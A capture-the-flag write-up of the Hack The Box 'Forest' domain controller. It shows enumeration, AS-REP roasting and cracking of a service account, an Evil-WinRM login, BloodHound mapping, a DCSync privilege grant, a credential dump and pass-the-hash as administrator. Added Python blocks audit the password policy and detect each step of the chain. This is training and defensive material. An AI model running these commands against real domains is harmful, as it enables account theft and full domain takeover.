As usual, first an nmap scan:

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp
Starting Nmap 7.80 ( ) at 2020-01-06 11:47 CET
Nmap scan report for
Host is up (0.016s latency).
Not shown: 65511 closed ports
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-joined system in the HTB.local domain. It exposes Kerberos, LDAP and SMB services to the outside world and looks like a domain controller. And last but not least, a WinRM port (5985) is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ machine on Hackthebox, combined with the WinRM attack on Heist!

PORT 3268 (LDAP)

LDAP stands for Lightweight Directory Access Protocol. It is used for querying and locating data about organizations, individuals and other resources such as files and devices in a network, so there are tools for searching it for users, groups and so on.

The tool I found to work is windapsearch; there is no need to clone the repository, simply go to its releases page and download the compiled binary:

windapsearch-linux-amd64 -d 'htb.local' --dc -m users

We can also use enum4linux to list some more information:

root@kalivm:~/Forest# enum4linux -a
Starting enum4linux v0.8.9 
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Getting domain SID for    |
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
|    Users on    |
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
|    Password Policy Information for    |
[+] Attaching to using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
|    Groups on    |
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
enum4linux complete on Mon Oct 21 12:05:29 2019

The enum4linux output offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to be enforced, which can mean easy-to-guess or easy-to-crack passwords. There seems to be a Microsoft Exchange installation present, which is commonly known as a major security risk if not properly configured! And a last line confirms the suspicion: Forest really is a member of the Domain Controllers group! So I started browsing the impacket tools and trying several until I got to the tool that worked:
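
As an added example (not part of the original writeup), the following Python script parses the password-policy block and the group-membership lines from the enum4linux output above and reports what a defender would want to fix: a baseline check on the policy, and a transitive group-membership lookup that shows svc-alfresco landing in 'Privileged IT Accounts' through the nested 'Service Accounts' group. The baseline thresholds are assumptions chosen for this example, and the sample inputs are constructed copies of the output above.

```python
"""Audit helpers for enum4linux output: parse the password-policy block and the
group-membership lines, then report what a defender should fix.
Sample inputs below are constructed copies of the enum4linux output above."""
import re

SAMPLE_POLICY = """\
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000000
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
"""

SAMPLE_MEMBERSHIPS = r"""Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
"""

# Baseline thresholds assumed for this example; substitute your own organisation's.
BASELINE = {"min_length": 14, "max_lockout_threshold": 10, "min_history": 24}


def parse_policy(text):
    """Map every '[+] Setting: value' line to {setting: value}."""
    return {m.group(1).strip(): m.group(2).strip()
            for m in re.finditer(r"\[\+\]\s+([^:\n]+):\s*(.*)", text)}


def audit_policy(policy, baseline=BASELINE):
    """Return human-readable findings for settings weaker than the baseline."""
    findings = []
    min_len = int(policy.get("Minimum password length", "0"))
    if min_len < baseline["min_length"]:
        findings.append(f"minimum length {min_len} < {baseline['min_length']}")
    if policy.get("Domain Password Complex") == "0":
        findings.append("complexity disabled: single dictionary words are accepted")
    threshold = policy.get("Account Lockout Threshold", "None")
    if threshold == "None":
        findings.append("no lockout threshold: unlimited online guessing")
    elif int(threshold) > baseline["max_lockout_threshold"]:
        findings.append(f"lockout threshold {threshold} > {baseline['max_lockout_threshold']}")
    if int(policy.get("Password history length", "0")) < baseline["min_history"]:
        findings.append("password history too short")
    return findings


def parse_memberships(text):
    """Map group -> set of direct members from "Group 'X' (RID: n) has member: DOM\\Y" lines."""
    groups = {}
    pattern = r"Group '([^']+)' \(RID: \d+\) has member: [^\\]+\\(.+)"
    for group, member in re.findall(pattern, text):
        groups.setdefault(group, set()).add(member.strip())
    return groups


def effective_groups(principal, groups):
    """Transitive group membership: follow nesting until no new group turns up."""
    found, frontier = [], [principal]
    while frontier:
        current = frontier.pop()
        for group, members in groups.items():
            if current in members and group not in found:
                found.append(group)   # direct or nested membership
                frontier.append(group)
    return found


if __name__ == "__main__":
    for finding in audit_policy(parse_policy(SAMPLE_POLICY)):
        print("policy:", finding)
    for g in effective_groups("svc-alfresco", parse_memberships(SAMPLE_MEMBERSHIPS)):
        print("svc-alfresco is effectively a member of:", g)
```

The transitive lookup is the same question BloodHound answers graphically later in the writeup; on a real domain the membership lines would come from a full enum4linux run or an LDAP export rather than the four lines embedded here.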

└──╼ $python3 -dc-ip -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation


root@kalivm:~/Forest# -dc-ip -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# -dc-ip -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco

After trying it for some users, I finally got a TGT for the user svc-alfresco (the one account tried that has UF_DONT_REQUIRE_PREAUTH set), which I could try cracking with John:

└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed

So apparently svc-alfresco’s password is s3rvice. All you have to do now is log in, get the user hash and start escalating privileges:

└──╼ $evil-winrm -i -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

Privilege Escalation

Use BloodHound and SharpHound.exe of the same version!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> upload SharpHound.exe

Info: Uploading /home/puck/htb/forest/SharpHound.exe to C:\Users\svc-alfresco\Documents\puck\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ./SharpHound.exe
2024-03-23T06:29:47.6623457-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T06:29:47.7871629-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T06:29:47.8183965-07:00|INFORMATION|Initializing SharpHound at 6:29 AM on 3/23/2024
2024-03-23T06:29:48.0371459-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-03-23T06:29:48.1621474-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T06:29:48.6465284-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-03-23T06:29:48.7871527-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T06:29:48.7871527-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T06:30:19.3799074-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM
2024-03-23T06:30:34.9184755-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T06:30:34.9809738-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T06:30:35.1372236-07:00|INFORMATION|Status: 161 objects finished (+161 3.5)/s -- Using 48 MB RAM
2024-03-23T06:30:35.1372236-07:00|INFORMATION|Enumeration finished in 00:00:46.4988600
2024-03-23T06:30:35.2153513-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T06:30:35.2309746-07:00|INFORMATION|SharpHound Enumeration Completed at 6:30 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ls

Directory: C:\Users\svc-alfresco\Documents\puck

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 6:30 AM 18835
-a---- 3/23/2024 6:30 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 3/23/2024 6:29 AM 1046528 SharpHound.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> download

Info: Downloading C:\Users\svc-alfresco\Documents\puck\ to

Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck>

Then load the zip file directly into BloodHound by simply dragging it in.

Putting all the pieces together, the following is our attack path.

  1. Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.
  2. Add the user to the Exchange Windows Permissions group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
  3. Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
  4. Perform a DcSync attack and dump the password hashes of all the users on the domain.
  5. Perform a Pass the Hash attack to get access to the administrator’s account.
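
Added example, not from the original post: detection logic for each step of this chain, from the AS-REP request that yielded the svc-alfresco hash earlier in the writeup through the account creation, the group addition, the DACL change on the domain root and the DCSync itself, run over constructed Security-log events flattened to key=value pairs. Field names follow the Windows Security event XML (4768 PreAuthType/TicketEncryptionType, 4720, 4728/4756, 5136, 4662) and the replication-right GUIDs are the well-known Active Directory constants; the sample lines, the source IP address and the key=value layout are constructed for this example.

```python
"""Detection rules for the escalation chain, run over constructed Security-log
events flattened to key=value pairs (not real Windows logs)."""
import re
from dataclasses import dataclass

# Well-known AD extended-right GUIDs that a DCSync needs.
DS_REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
RC4_HMAC = "0x17"                 # TicketEncryptionType for etype 23, the one john cracked
DOMAIN_ROOT = "DC=htb,DC=local"   # the object whose DACL the chain rewrites
# Groups whose membership hands out control over the domain object or over accounts.
WATCHED_GROUPS = {"Exchange Windows Permissions", "Exchange Trusted Subsystem",
                  "Account Operators", "Domain Admins", "Enterprise Admins"}

# Constructed sample events; the IP address and layout are made up for this example.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=lucinda PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.14.5
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5
EventID=4720 SubjectUserName=svc-alfresco TargetUserName=puck
EventID=4728 SubjectUserName=svc-alfresco MemberName=CN=puck,CN=Users,DC=htb,DC=local TargetUserName="Exchange Windows Permissions"
EventID=5136 SubjectUserName=puck ObjectDN=DC=htb,DC=local AttributeLDAPDisplayName=nTSecurityDescriptor OperationType=%%14674
EventID=4662 SubjectUserName=FOREST$ ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=puck ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
""".splitlines()


@dataclass
class Alert:
    rule: str
    subject: str
    detail: str


def parse_event(line):
    """Split 'Key=value' pairs; a value may be double-quoted to carry spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def is_machine_account(name):
    """Domain controllers replicate legitimately; their accounts end in '$'."""
    return name.endswith("$")


def detect(lines):
    """Apply one rule per chain step and correlate freshly created accounts."""
    alerts, created = [], {}          # created: new account -> who created it
    for line in lines:
        ev = parse_event(line)
        eid, subj = ev.get("EventID"), ev.get("SubjectUserName", "")
        if eid == "4768" and ev.get("PreAuthType") == "0" \
                and ev.get("TicketEncryptionType") == RC4_HMAC:
            # AS-REQ accepted without pre-authentication and answered with an RC4
            # ticket: the AS-REP is crackable offline, exactly what john did above.
            alerts.append(Alert("ASREP_ROAST", ev["TargetUserName"],
                                f"no-preauth RC4 AS-REP requested from {ev.get('IpAddress')}"))
        elif eid == "4720":
            created[ev["TargetUserName"]] = subj
        elif eid in ("4728", "4756") and ev.get("TargetUserName") in WATCHED_GROUPS:
            member = ev["MemberName"].split(",")[0]
            member = member[3:] if member.startswith("CN=") else member
            detail = f"{subj} added {member} to {ev['TargetUserName']}"
            if member in created:
                detail += f" (account created in this window by {created[member]})"
            alerts.append(Alert("WATCHED_GROUP_ADD", subj, detail))
        elif eid == "5136" and ev.get("ObjectDN") == DOMAIN_ROOT \
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor":
            alerts.append(Alert("DOMAIN_ACL_CHANGE", subj,
                                f"{subj} rewrote the DACL of {DOMAIN_ROOT}"))
        elif eid == "4662" and not is_machine_account(subj):
            guids = set(re.findall(r"[0-9a-f-]{36}", ev.get("Properties", "")))
            if guids & DS_REPL_GUIDS:
                alerts.append(Alert("DCSYNC", subj,
                                    f"{subj} used replication rights on {ev.get('ObjectType')}"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.subject}: {a.detail}")
```

The 4662 rule is the one worth tuning first: replication events from domain controllers and from backup or sync accounts are normal, so the allow-list of subjects should reflect the environment rather than just the trailing dollar sign used here. The 5136 rule requires auditing of directory service changes to be enabled with a SACL on the domain root, otherwise the event is never written.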

Alright, let’s get started.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net user puck Password /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net users /domain

User accounts for \\

$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark puck santi
sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a
SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group

Group Accounts for \\

*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*UM Management
*View-Only Organization Management
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group "Exchange Windows Permissions" /add puck
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck>
$pass = convertto-securestring 'Password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('htb\puck', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity puck -Rights DCSync
And then dump the domain credentials:
└─$ python3 puck:Password@ 
Impacket v0.9.25.dev1+20230823.145202.4518279 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up... 



└──╼ $evil-winrm -i -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>



Author: Puckiestyle
